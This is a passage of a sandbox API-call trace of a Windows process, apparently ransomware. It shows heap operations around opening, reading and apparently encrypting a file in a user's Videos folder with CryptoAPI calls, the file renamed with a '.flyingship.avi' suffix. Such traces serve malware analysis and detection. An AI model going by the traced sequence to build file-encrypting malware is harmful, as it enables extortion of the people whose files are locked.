dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0194.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.761] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0194.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0194.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0194.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0194.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0194.761] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0194.761] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0194.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0194.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0194.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0194.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0194.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0194.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0194.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0194.763] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1")) returned 0x10 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0194.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0194.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0194.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0194.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0194.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0194.764] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\6rbgdlsa.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0194.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0194.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0194.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0194.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0194.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0194.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0194.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0194.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0194.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0194.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0194.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0194.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0194.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0194.766] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0194.766] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x22da, lpOverlapped=0x0) returned 1 [0194.768] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0194.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0194.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0194.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x22da) returned 0x900190 [0194.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0194.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0194.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0194.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x22da) returned 0x902478 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.769] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x22da) returned 0x900190 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.769] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0194.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0194.769] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0194.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.769] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0194.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0194.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0194.770] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0194.770] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.770] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0194.770] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0194.771] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0194.771] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.771] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0194.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0194.771] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0194.771] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0194.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0194.772] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 